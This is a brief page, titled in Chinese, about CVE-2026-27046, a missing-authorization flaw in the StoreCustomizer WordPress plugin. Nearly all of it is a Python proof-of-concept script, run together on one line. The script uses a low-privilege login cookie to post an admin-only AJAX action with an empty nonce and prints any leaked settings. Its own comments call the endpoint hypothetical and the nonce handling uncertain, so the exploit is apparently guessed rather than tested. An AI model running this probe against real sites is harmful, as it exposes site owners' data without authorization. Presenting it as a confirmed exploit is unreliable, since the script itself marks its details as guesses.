CVE-2026-27046 StoreCustomizer权限缺失漏洞

# PoC for CVE-2026-27046 Missing Authorization import requests def check_vulnerability(target_url, cookie): # Hypothetical vulnerable endpoint based on plugin structure url = f"{target_url}/wp-admin/admin-ajax.php" headers = { "User-Agent": "Mozilla/5.0", "Cookie": cookie } # Attempting to access admin-only function with low privilege data = { "action": "woocustomizer_get_settings", "security": "" # Nonce might be required or bypassed } response = requests.post(url, data=data, headers=headers) if response.status_code == 200 and "settings" in response.text.lower(): print("[+] Vulnerability confirmed! Sensitive data leaked.") print(response.text[:200]) else: print("[-] Vulnerability not exploited or patched.") # Usage: check_vulnerability("http://target-site.com", "wordpress_logged_in_xxx...")